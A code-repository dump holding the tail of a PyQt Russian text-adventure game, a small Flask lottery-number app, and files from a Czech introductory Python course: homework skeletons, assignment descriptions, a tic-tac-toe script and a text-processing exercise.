QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вы решили помочь королю. Он просит спасти его дочь. Она заколдована.\nЧтобы ее вылечить нужно приготовить зелье. Вы умеете?''')\n self.pushButton_2.setText('Да')\n self.pushButton_3.setText('Нет')\n\n def closefunction(self):\n self.close()\n\n def openfunction1(self):\n self.second_form = ZWindow(self)\n self.second_form.show()\n self.close()\n\n def openfunction2(self):\n self.second_form = EndWindow(self)\n self.second_form.show()\n self.close()\n\n\nclass PrisonWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('prison_by_gregmks-d30mry0.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Очень жаль. Король не любит отказов. Вас схватили и отправили в темницу.\nЗавтра на рассвете вы будете казнены.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass ZWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('happy-end.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Вам повезло. Вы спасаете принцессу. Король отдаёт её вам в жёны\nи вы наследник всего королевства!''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\n\nclass EndWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('24869_1054353600.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Король в ярости, из-за того, что вы его подвели.\nВас выгнали из замка, но вы хотя бы живы.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\n\nclass NewWindow(QMainWindow, Ui_MainWindow3):\n def __init__(self, *args):\n super().__init__()\n self.setupUi(self)\n self.show()\n self.flag = False\n self.pushButton_2.clicked.connect(self.closefunction)\n self.pushButton_3.clicked.connect(self.closefunction)\n pixmap = QPixmap('2294958-8XPU3.jpg')\n cw, ch = 641, 551\n iw = pixmap.width()\n ih = pixmap.height()\n\n if iw / cw < ih / ch:\n pixmap = pixmap.scaledToWidth(cw)\n hoff = (pixmap.height() - ch) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(0, hoff), QPoint(cw, pixmap.height() - hoff))\n )\n\n elif iw / cw > ih / ch:\n pixmap = pixmap.scaledToHeight(ch)\n woff = (pixmap.width() - cw) // 2\n pixmap = pixmap.copy(\n QRect(QPoint(woff, 0), QPoint(pixmap.width() - woff, ch))\n )\n self.label.setPixmap(pixmap)\n self.textEdit.setText('''Ой, а тут ловушка. Вас поймали стражи замка. Теперь бежать уже не получиться.''')\n self.pushButton_2.setText('Завершить')\n self.pushButton_3.setText('Завершить')\n\n def closefunction(self):\n self.close()\napp = QApplication(sys.argv)\nex = MainWindow()\nex.show()\nsys.exit(app.exec_())\n"
}
] | 1 |
mikeypy/lottoNumbers
|
https://github.com/mikeypy/lottoNumbers
|
e8af0befc9352a4782f28b334f2571b59f04a54a
|
ea21ef89e19b34e6fd4bd2a9f33aa97ea73ad385
|
f077605ba190338b0f1f8b175ab8b845cf01be4a
|
refs/heads/master
| 2023-02-19T13:43:10.235160 | 2019-12-30T15:31:04 | 2019-12-30T15:31:04 | 164,925,382 | 0 | 0 | null | 2019-01-09T19:33:30 | 2019-12-30T15:31:07 | 2023-02-02T04:37:20 |
HTML
|
[
{
"alpha_fraction": 0.49571603536605835,
"alphanum_fraction": 0.5263158082962036,
"avg_line_length": 20.421052932739258,
"blob_id": "fb9729263239d00243f27b0366bb321e8b005a63",
"content_id": "ab88386773c95e3a333b755bbef678b4dc4459e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 817,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 38,
"path": "/app/views.py",
"repo_name": "mikeypy/lottoNumbers",
"src_encoding": "UTF-8",
"text": "from flask import render_template\nfrom app import app\nimport random\n\n\[email protected]('/')\[email protected]('/index')\n\ndef index():\n \"\"\"Index Page for Webapp\"\"\"\n special = {'num':random.randint(1,11), 'num2': random.randint(1,11)}\n numbers = [\n {\n 'one': random.randint(1,50),\n \n \n 'two': random.randint(1,50),\n \n \n 'three': random.randint(1,50),\n \n \n 'four': random.randint(1,50),\n \n \n 'five': random.randint(1,50)\n } \n ]\n #numbers = {'one':random.sample(range(50), 5)}\n return render_template('index.html', title='Home', numbers=numbers, special = special)\n\n\n\[email protected]('/about')\ndef about():\n \"\"\"About Page for Webapp\"\"\"\n \n return render_template('about.html', title='About')\n\n\n\n"
}
] | 1 |
effa/ib111
|
https://github.com/effa/ib111
|
65e00c63bd269445a0df02f867109431627541bc
|
6accd5c033ab14466055d9cc575a6cc472ae73d6
|
d79efcf4faa77b1db94fa96c6153fd7c09ac4675
|
refs/heads/master
| 2021-06-04T21:21:23.457987 | 2017-12-12T09:39:24 | 2017-12-12T09:39:24 | 23,517,533 | 4 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4494584798812866,
"alphanum_fraction": 0.5956678986549377,
"avg_line_length": 12.850000381469727,
"blob_id": "5dad964ad647d94bf2d8a7d97b54c213d29c4529",
"content_id": "1bc047298f29fd1230a73bf9ac27de4280c5fc84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 40,
"path": "/homeworks/homework_01.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "def alternating_sequence(n, a, b):\n # Nahradte `pass` implementaci pozadovane funkce.\n pass\n\n\ndef selected_numbers(a, b):\n pass\n\n\ndef near_divisors(n):\n pass\n\n\ndef striped_rectangle(width, height):\n pass\n\n\ndef differences_table(n):\n pass\n\n\nalternating_sequence(10, 7, 1)\n# 7 1 14 1 21 1 28 1 35 1\n\nselected_numbers(3, 5)\n# 30 35 60 65 90 95\n\nnear_divisors(20)\n# 3 6 9 11 19 21\n\nstriped_rectangle(9, 6)\n\ndifferences_table(5)\n# 1 2 3 4 5\n# - - - - -\n# 1 | 0 1 2 3 4\n# 2 | 1 0 1 2 3\n# 3 | 2 1 0 1 2\n# 4 | 3 2 1 0 1\n# 5 | 4 3 2 1 0\n"
},
{
"alpha_fraction": 0.6021825671195984,
"alphanum_fraction": 0.6145833134651184,
"avg_line_length": 25.295652389526367,
"blob_id": "f45a330b9b22fba3de8605c12006ac18a96c444e",
"content_id": "9a007c9d43659b363a25ea50c87f079a4d7b88f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6048,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 230,
"path": "/week11/week11.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "\"\"\"Week 11: Text processing and data analysis.\n\nAssumes the following files in the same directory as this script:\n- 'alice-in-wonderland.txt': https://github.com/effa/ib111/week11/alice-in-wonderland.txt\n- 'devatero-pohadek.txt': https://github.com/effa/ib111/week11/devatero-pohadek.txt\n\nEdit the last two lines of this script to run either main() or test().\n- test() runs provided doctests, shows errors (or nothing if everything works)\n- main() runs any manual tests and print results\n\"\"\"\nimport re\nfrom random import randint\n\n\ndef to_words(text):\n \"\"\"Return a list of lower-cased words without interpunction.\n\n >>> to_words('A rabbit, a cat, and an eagle!')\n ['a', 'rabbit', 'a', 'cat', 'and', 'an', 'eagle']\n \"\"\"\n text = text.lower()\n # Use regular expressions to replace all non-word characters by spaces.\n text_without_interpuction = re.sub('[\\W_]', ' ', text)\n words = text_without_interpuction.split()\n return words\n\n\n# ------------- Task 11.1 --------------\n\ndef average_word_length(book):\n \"\"\"Return average legnth of a word in a given book.\n\n >>> average_word_length('alice-in-wonderland.txt')\n 3.93...\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.2 --------------\n\ndef save_words_sorted_alphabetically(book, output_filename='words.txt'):\n \"\"\"Save all words from the book sorted alphabetically to a new file.\n\n >>> save_words_sorted_alphabetically('alice-in-wonderland.txt')\n >>> with open('words.txt', 'r') as infile:\n ... print(infile.read().split()[:5])\n ['a', 'abide', 'able', 'about', 'above']\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.3 --------------\n\ndef save_words_sorted_by_length(book, output_filename='words.txt', min_length=3):\n \"\"\"Save words having at least `min_length` letters sorted by length.\n\n >>> save_words_sorted_by_length('alice-in-wonderland.txt')\n \"\"\"\n # TODO\n pass\n\n\ndef save_words_sorted_by_length_alphabetically(book, output_filename='words.txt', min_length=3):\n \"\"\"Save words having at least `min_length` letters sorted by length.\n\n Words with the same length are sorted alphabetically.\n\n >>> save_words_sorted_by_length_alphabetically('alice-in-wonderland.txt')\n >>> with open('words.txt', 'r') as infile:\n ... print(infile.read().split()[:5])\n ['act', 'ada', 'age', 'ago', 'air']\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.4 --------------\n\ndef print_longest_words_in_book(book, n=5):\n \"\"\"Compute n longest words and print them ordered by their length.\n\n Each word appears at most once in the list.\n Words with the same length are sorted alphabetically.\n\n >>> print_longest_words_in_book('alice-in-wonderland.txt', n=5)\n affectionately\n contemptuously\n disappointment\n multiplication\n circumstances\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.5 --------------\n\ndef most_frequent_words_in_text(text, n=10, min_length=3):\n \"\"\"Compute n most frequent words and print them ordered by frequency.\n\n >>> most_frequent_words_in_text(\n ... 'A rabbit, a cat, an eagle, a rabbit, a cat, a rabbit and a rabbit!',\n ... n=2, min_length=3)\n rabbit 4\n cat 2\n \"\"\"\n # TODO\n pass\n\n\ndef most_frequent_words_in_book(book, n=10, min_length=3):\n \"\"\"Compute n most frequent words and print them ordered by frequency.\n\n Hint: Use most_frequent_words_in_text().\n\n >>> most_frequent_words_in_book('alice-in-wonderland.txt', n=4, min_length=5)\n alice 398\n little 128\n there 99\n about 94\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.6 --------------\n\ndef compute_next_tokens_map(text):\n \"\"\"Return a dictionary mapping tokens to list of next tokens.\n\n >>> next_tokens = compute_next_tokens_map('A rabbit, a rabbit, and a cat!')\n >>> next_tokens['a']\n ['rabbit,', 'cat!']\n >>> next_tokens['rabbit,']\n ['a', 'and']\n >>> next_tokens['cat!']\n []\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.7 --------------\n\ndef compute_first_tokens(text):\n \"\"\"Return a list of tokens that could appear at the beginning of a sentence\n\n >>> compute_first_tokens('First sentence. Another sentence? Yes!')\n ['First', 'Another', 'Yes!']\n \"\"\"\n # Very simple heuristic: Just take tokens with upper-cased first letter.\n tokens = text.split()\n first_tokens = [token for token in tokens if token[0].isupper()]\n return first_tokens\n\n\ndef select_random(tokens):\n \"\"\"Return a random token from a list of tokens.\n\n >>> select_random(['single'])\n 'single'\n \"\"\"\n # TODO\n pass\n\n\nBOOKS = {\n 'carroll': 'alice-in-wonderland.txt',\n 'capek': 'devatero-pohadek.txt',\n}\n\n\ndef imitate(author, n_words=50):\n \"\"\"Generate new bestseller of given author generated on demand.\n\n Args:\n author: one of {'carroll', 'capek'}\n n_words: How many words to generate.\n\n Return:\n Generated text.\n\n Hints:\n Use compute_next_tokens_map(), compute_first_tokens(), select_random()\n and BOOKS dictionary.\n\n >>> generated_text = imitate('carroll')\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.8 --------------\n\ndef imitate_sentences(author, n_sentences=10):\n \"\"\"Generate n sentences imitating given author.\n\n Ideas for improvements (you can focus on Czech/English only):\n - use 2 previous tokens to select the new one\n - use 1-5 previous tokens (randomly) to select the new one\n - randomly insert sometimes words/sentences from recipes/textbooks\n - randomly replace some names/pronouns with names of your friends\n \"\"\"\n pass\n\n\n# ------------- main and test --------------\n\ndef main():\n print('\\nCarroll:\\n')\n print(imitate('carroll'))\n print('\\nCapek:\\n')\n print(imitate('capek'))\n\n\ndef test():\n \"\"\"Check examples in docstrings.\n\n If the actual output matches the expected output, doesn't print anything.\n Otherwise, it prints an error message showing the mismatch.\n \"\"\"\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS)\n\n\nif __name__ == '__main__':\n #main()\n test()\n"
},
{
"alpha_fraction": 0.7543942928314209,
"alphanum_fraction": 0.7738717198371887,
"avg_line_length": 55.89189147949219,
"blob_id": "cd93c8487f0e9354f988313b1c7b50ff052a5414",
"content_id": "05d3d42e3267b292f870ea73a70bdbc6d24d9c39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2293,
"license_type": "no_license",
"max_line_length": 381,
"num_lines": 37,
"path": "/homeworks/homework_03.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 3\n* soft deadline je 12. 11., nejpozději však odevzdávejte do 19. 11.\n* úloha je za 30 bodů\n* odevzdávejte jeden soubor pojmenovaý `homework_03.py`\n* odevzdávárna [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 3](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw3/)\n* nezapomeňte program psát pěkně, hezky dělit na funkce a rozumně komentovat\n\n## Connect four\nTentokrát budete programovat [Connect four](https://cs.wikipedia.org/wiki/Cestovní_piškvorky) (také známé jako padající nebo cestovní piškvorky).\n\n### Pravidla\nHru hrají dva hráči, kteří střídavě do hracího pole umisťují svoje hrací kameny (v našem případě označené X a O). Hráč, který dostane 4 své hrací kameny do řady, sloupce nebo diagonály vyhrál. Hráči ovšem vybírají pouze sloupec, do kterého kámen umístí a ten \"spadne\" na nejnižší prázdné místo v daném sloupci. Pokud je hrací pole zaplněné a žádný z hráčů nevyhrál, nastává remíza.\n\n### Poznamky\n* herní pole si reprezentujte jako pole polí po řádcích\n* pro lidského hráče vypisujte nějaký dotaz na zadání sloupce\n* pro počítačového hráče nejdříve implementujte strategii, která hraje náhodně, lepší můžete udělat později\n* [tady](https://github.com/effa/ib111/blob/master/ticTacToe.py) máte kód na piškvorky, který jsme si ukazovali na cviku\n\n### Kostra\n* [kostra](homework_03.py)\n* v kostře máte předdefinované hlavičky několika funkcí, ale určitě můžete (a měli byste) si dělat i nějaké pomocné funkce\n* nemusíte se omezovat na `human_play` a `computer_play`, můžete si naprogramovat i další (např. `better_computer_play`)\n\n### Příklad výpisu stavu hry\n```\n X\n X O\n O X O\n_ _ _ _\n1 2 3 4\n```\n\n### Bonus\nBonusem k této úloze na naimplementovat nějakou jinou než náhodnou strategii. Funkci se strategií pojmenujte `bonus_play` a stejně jako ostatní funkce pro hráče bude brát stav hry, číslo hráče a bude vracet číslo sloupce.\n\nBonus pro tuto úlohu je zajímavý tím, že část bonusových bodů dostanete za samotnou implementaci a část soutěžením se strategiemi ostatních. Vyhodnocení soutěžní části si potom uděláme na cvičení po hard deadlinu.\n"
},
{
"alpha_fraction": 0.4446428716182709,
"alphanum_fraction": 0.4616071283817291,
"avg_line_length": 23.34782600402832,
"blob_id": "cfa9758d9ff9ea0918cefeb1134e77e8d8aa201d",
"content_id": "c07f1253847753dbc04b6f15f595a54a54f30dce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1120,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 46,
"path": "/ticTacToe.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "N = 3\ndef empty_plan():\n return [[0 for i in range(N)]\n for j in range(N)]\n \n\ndef determine_winner(plan):\n for i in range(N):\n all_same = True\n for j in range(N):\n if plan[i][j] != plan[i][0]:\n all_same = False\n if all_same and plan[i][0] != 0:\n return plan[i][0]\n \n all_same = True\n for j in range(N):\n if plan[j][i] != plan[0][i]:\n all_same = False\n if all_same and plan[0][i] != 0:\n return plan[0][i]\n return 0\n\n\ndef print_plan(plan):\n symbol = {0: \".\", 1: \"X\", 2: \"O\"}\n for i in range(N):\n for j in range(N):\n print(symbol[plan[i][j]], end=\" \")\n print()\n \n \ndef play():\n plan = empty_plan()\n player = 1\n while determine_winner(plan) == 0:\n print_plan(plan)\n move = input(\"Player \"+str(player)+\" move:\")\n x, y = list(map(int, move.split(\" \")))\n plan[y-1][x-1] = player\n player = 3 - player\n print_plan(plan)\n print(\"Player \"+str(determine_winner(plan))+\" wins.\")\n\n \nplay()\n"
},
{
"alpha_fraction": 0.718898594379425,
"alphanum_fraction": 0.7421777248382568,
"avg_line_length": 33.43965530395508,
"blob_id": "9de535fbac44224801b4cb771005d2c1bda0449f",
"content_id": "ffc76c82cd45c2e3ae2d637565c2703c45f26c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4358,
"license_type": "no_license",
"max_line_length": 511,
"num_lines": 116,
"path": "/homeworks/homework_05.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 5: Text a obrázky\n* Termín odevzdání: neděle 17. 12 (soft deadline).\n* Pro případ nouze bude odevzdávárna otevřená až do středy 27. 12. (hard deadline).\n* Odevzdejte jediný soubor `homework_05.py`.\n* Odevzdávárna:\n [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 5](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw5/)\n* Pište přehledný kód, používejte vhodná jména proměnných, odstraňte duplicitní kód.\n* Případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Úlohu vypracujte zcela samostatně.\n* Řešení domácí úlohy si užijte :-)\n\n## Zadání\n\nTato úloha nemá kostru a je zadána částečně otevřeně, abyste se mohli zaměřit na to, co vám přijde zajímavé. Za skvělé řešení můžete získat i bonusové body.\nDo komentářů uveďte, jakým způsobem či v jakém rozsahu jednotlivé úlohy řešíte\na na konec připojte i ukázková volání.\n\n### Analýza křestních jmen (5 bodů)\n\nVyužijte soubor s anglickými jmény [names.txt](./names.txt).\nVypočítejte, kolik jmen začíná na které písmeno\na vypište tyto počte sestupně:\n\n```\nM : 487\nL : 430\nC : 413\nA : 394\n...\n```\n\nDále pomocí textové grafiky vykreslete graf četností\n(písmena na x-ové ose opět seřaďte sestupně podle četností).\nVýsledek může vypadat nějak takto:\n\n```\n500 #\n450 ##\n400 #####\n350 ######\n300 #######\n250 ###########\n200 ############\n150 ###############\n100 ####################\n 50 #######################\n MLCASJDRETKBGNHVFPWIOYZQUX\n```\n\n\n### Hledání jména pro potomka (5 bodů)\n\nNapište funkci `find_name_for_your_child()`,\nkterá pomůže interaktivně vybrat vhodné jméno (případně více jmen) pro dítě pomocí několika otázek, např.:\n* jaké má být první písmeno\n* maximální délka jména\n* minimální počet samohlásek\n* maximální počet různých písmen\n* obsahující nějaké požadované písmeno alespoň N-krát\n* ...\n\nImplementujte alespoň 3 kritéria (dekomponujte je do pomocných funkcí).\nFunkce `find_name_for_your_child()` se postupně zeptá na tato kritéria\na měla by umožnit kritérium přeskočit, pokud pro uživatele není důležité.\nNakonec vypíše všechna jména, která splňují všechna zadaná kritéria,\nseřazená abecedně.\n\n\n### Rozmazání obrázku (5 bodů)\n\nNapiště funkci `blur(filename='landscape.jpg', radius=4)`, která daný obrázek rozmaže a ukáže výsledek. Funkce bere jako parametry cestu ke zdrojovému obrázku a míru rozmazání. Výsledek může vypadat následovně:\n\n\n\n\n### Prolnutí obrázků (5 bodů)\n\nNapiště funkci `combine(left='left.jpg', right='right.jpg')`,\nkterá nějakým způsobem skombinuje dva obrázky (stejné velikosti) do jednoho,\nnapříklad plynulým přechodem od jednoho ke druhému:\n\n\n\n\n### Funkční krajina (5 bodů)\n\nNapište funkci `draw_function(function, size=200)`, která vykreslí předanou funkci `function` na intervalu od -1 do 1 (rozsah zobrazovaných funkčních hodnot bude také od -1 do 1) na obrázek o šířce i výšce `size` pixelů například tak, že všechny body pod hodnotou dané funkce se vybarví černě a všechny body nad bíle.\nZkuste pak pomocí této funkce vykreslit co nejroztodivnější krajinu.\n(Tip na možná rozšíření: barevné gradienty, nebe, stromky.)\n\n\n```\ndef linear(x):\n return 0.5 * x\n\ndef hill(x):\n return (-1) * (x ** 2)\n\ndef draw_landscape(function, size=200):\n pass\n\ndraw_function(linear)\ndraw_function(hill)\n```\n\n\n\n\n\n\n### Želvy (15 bodů)\n\nUdělejte objektovou implementaci želví grafiky s vykreslováním do SVG (na základě kódů uvedených ve slidech k přednášce). Implementujte metody pro \"otočení směrem k zadané želvě\" a \"vykreslení spojnice se zadanou želvou\". Za využití těchto metod vytvořte zajímavé obrázky, např. následující (první obrázek je \"želví honička\", kdy několik želv honí jednu, druhý obrázek vznikne tak, že dvě želvy jdou po kružnici, jedna jde rychleji než druhá, pravidelně vykreslujeme spojnice, barvy řešit můžete, ale nemusíte).\n\n\n"
},
{
"alpha_fraction": 0.6791443824768066,
"alphanum_fraction": 0.7153192758560181,
"avg_line_length": 31.43877601623535,
"blob_id": "c714e6eefec94ce37367dc94a0d66f1138fb2d4b",
"content_id": "61af64df8792f3db5f4d499c57b136a4e362865d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3464,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 98,
"path": "/homeworks/homework_01.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 1\n\n* Termín odevzdání: neděle 1. 10 (soft deadline). Pro případ nouze bude odevzdávárna otevřená až do 8. 10. (hard deadline). Později už úlohu odevzdat nepůjde.\n* Úloha se skládá z 5 příkladů, za každý můžete získat 5 bodů, takže celkem až 25 bodů.\n* Odevzdejte jediný soubor `homework_01.py` s implementací požadovaných funkcí. Funkce pojmenujte stejně jako v zadání.\n* Můžete použít připravenou [kostru programu](homework_01.py).\n* Odevzdávárna: [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 1](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw1).\n* Pište přehledný kód, používejte vhodná jména proměnných a případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Pokud se vám nějakou úlohu nepodaří úplně vyřešit, tak nezoufejte, zkuste si zadaný problém zjednodušit a vyřešit tento zjednodušený problém. Do komentáře pak napište, v čem zjednodušení spočívá (např. \"Vykresli obdelnik pozadovane velikosti, ale bez pruhu.\") a úplně nejlépe zkuste taky popsat překážku, kvůli které se vám nedaří vyřešit původní problém v plném rozsahu.\n* Úlohy vypracovávejte zcela samostatně.\n* Řešení domácích úloh si užívejte :-)\n\n\n## Alternující posloupnost\n\nNapište funkci `alternating_sequence(n, a, b)`,\nkterá vypíše prvních `n` členů posloupnosti,\nve které se střídají násobky čísla `a` s konstantní hodnotou `b`.\n\n```\ndef alternating_sequence(n, a, b): ...\n\n>>> alternating_sequence(10, 7, 1)\n7 1 14 1 21 1 28 1 35 1\n```\n\n## Vybraná čísla\n\nNapište funkci `selected_numbers(a, b)`,\nkterá vypíše všechna dvojciferná čísla,\njejichž první cifra je dělitelná číslem `a`\na druhá cifra je dělitelná číslem `b`:\n\n```\ndef selected_numbers(a, b): ...\n\n>>> selected_numbers(3, 5)\n30 35 60 65 90 95\n```\n\nTip: Pro spojení dvou podmínek, které musí platit současně, použijte klíčové\nslovo `and`.\n\n## Skorodělitelé\n\nNapište funkci `near_divisors(n)`, která vypíše všechna kladná čísla,\nkterá sice nejsou dělitelé čísla `n`,\nale od některého dělitele čísla `n` se liší pouze o 1.\n\n```\ndef near_divisors(n): ...\n\n>>> near_divisors(20)\n3 6 9 11 19 21\n```\n\nTip: Pro spojení dvou podmínek, ze kterých stačí, aby platila alespoň jedna, použijte klíčové slovo `or`.\n Dejte si pozor na pořadí vyhodnocování u složitějších aritmetických a logických výrazů a využijte závorek k jeho ovlivnění.\n\n## Pruhovaný obdélník\n\nFunkce `striped_rectangle(width, height)` vykreslí pomocí textové grafiky obdélník o zadaných rozměrech,\nkterý bude mít znakově rozlišený okraj, liché řádky a sudé řádky.\n\n```\ndef striped_rectangle(width, height): ...\n\n>>> striped_rectangle(9, 6)\n# # # # # # # # #\n# - - - - - - - #\n# ~ ~ ~ ~ ~ ~ ~ #\n# - - - - - - - #\n# ~ ~ ~ ~ ~ ~ ~ #\n# # # # # # # # #\n```\n\n\n\n## Tabulka rozdílů\n\nFunkce `differences_table(n)` vypíše tabulku s daným počtem řádků a sloupců (+ popisný řádek a sloupec),\nkde v každé buňce se nachází absolutní rozdíl čísla řádku a čísla sloupce.\n(Pro jednoduchost formátování klidně předpokládejte, že `n` je jednociferné.)\n\n\n```\ndef differences_table(n): ...\n\n>>> differences_table(5)\n 1 2 3 4 5\n - - - - -\n1 | 0 1 2 3 4\n2 | 1 0 1 2 3\n3 | 2 1 0 1 2\n4 | 3 2 1 0 1\n5 | 4 3 2 1 0\n```\n"
},
{
"alpha_fraction": 0.5730994343757629,
"alphanum_fraction": 0.6610526442527771,
"avg_line_length": 58.375,
"blob_id": "5038d25fa3c2ce2aba2fc89a284cb618f604969d",
"content_id": "b223336f427234ba78596b1d7abbab08920bcd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4443,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 72,
"path": "/README.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "IB111 Základy programování\n==========================\n\n* [Stránka předmětu](http://www.fi.muni.cz/IB111/)\n* [Sbírka úloh](http://www.fi.muni.cz/IB111/sbirka/)\n\n\nDomácí příprava\n--------------------\n* Každý týden: Vyřešit si samostatně všechny úlohy ze [sbírky](http://www.fi.muni.cz/IB111/sbirka/) k tématu z předchozího týdne.\n Projít si [kontrolní otázky](https://docs.google.com/document/d/19VeL15P5s8rv-YoCMwpIiQD34ptn6bevJKsV7mBD-Uo/view)\n a úvodní text kapitoly sbírky k nadcházejícímu cviku.\n* Občasně: odevzdávané domácí úlohy, viz níže.\n* Podle chuti a potřeby: tutoriály, kurzy a řešení dalších úloh k procvičování, viz níže.\n\nCvičení\n--------------------\n\nNásledující tabulka odkazuje na kapitolu ze [sbírky](http://www.fi.muni.cz/IB111/sbirka/) a hlavní úlohy, kterými je dobré na cvičení začít.\n\n| | Téma | Příklady |\n| --- | --- | --- |\n| 1 | [Želví grafika](http://www.fi.muni.cz/IB111/sbirka/01-zelvi_grafika.html) | 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2.1, 1.2.2 |\n| 2 | [Základní struktury](http://www.fi.muni.cz/IB111/sbirka/02-zakladni_struktury.html) | 2.1.1, 2.1.2, 2.1.4, 2.2.1, 2.3.1, 2.3.5 |\n| 3 | [Jednoduché výpočty](http://www.fi.muni.cz/IB111/sbirka/03-jednoduche_vypocty.html) | 3.1.1, 3.1.3, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.2.8, 3.2.10, 3.2.12, 3.3.2 |\n| 4 | [Náhodná čísla](http://www.fi.muni.cz/IB111/sbirka/04-nahodna_cisla.html) | 4.1.1, 4.1.3, 4.1.6, 4.2.1, 4.2.2 |\n| 5 | [Řetězce a seznamy](http://www.fi.muni.cz/IB111/sbirka/05-retezce_a_seznamy.html) | 5.1.1, 5.1.3, 5.2.1, 5.2.5, 5.2.6, 5.2.8, 5.3.1 |\n| 6 | [Binární vyhledávání](http://www.fi.muni.cz/IB111/sbirka/06-binarni_vyhledavani.html) | 6.1.1, 6.1.2, 6.2.1, 6.2.2, 6.2.3 |\n| 7 | [Algoritmy nad seznamy](http://www.fi.muni.cz/IB111/sbirka/07-seznamy_algoritmy.html) | vnitrozávod, 7.2.1, 